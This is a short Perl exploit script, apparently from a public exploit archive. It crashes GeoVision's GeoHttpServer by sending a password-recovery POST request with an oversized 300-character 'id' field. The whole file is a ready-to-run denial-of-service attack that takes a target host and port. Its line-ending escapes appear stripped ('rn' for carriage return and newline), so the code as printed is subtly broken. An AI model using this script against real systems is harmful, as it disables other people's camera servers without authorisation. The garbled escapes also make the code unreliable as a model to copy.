#!/usr/bin/perl

# Exploit Title: GeoHttpServer remote DoS
# Date: 7-5-2010
# Author: aviho1
# vendor: GeoVision
# Version: all
#info: the password recovery page does not properly validate user-supplied
password ,causing a dos.
use IO::Socket;

my $host = shift || 'localhost'; # Target host
my $port = shift || 80;

my $req = "POST /HintPwd.htm HTTP/1.1rn";
$req .= "Host: $host:$portrn";
$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he;
rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)rn";
$req .= "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
$req .= "Accept-Language: he,en-US;q=0.7,en;q=0.3rn";
$req .= "Accept-Encoding: gzip,deflatern";
$req .= "Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7rn";
$req .= "Keep-Alive: 300rn";
$req .= "Connection: keep-alivern";
$req .= "Referer: http://$host/rn";
$req .= "Content-Type: application/x-www-form-urlencodedrn";
$req .= "Content-Length: 309rnrn";
$req .=  "id=" . "A" x 300 . "&OK=OK";
print "nConnecting to $host on port $portn";

my $sock = new IO::Socket::INET( PeerAddr => $host, PeerPort => $port, Proto
=> 'tcp');
$sock or die "Cannot connect to server: $!";
print "Sending HTTP request..n";
print $sock $req;
print "Exploited. Target should be DoSedn";

close $sock;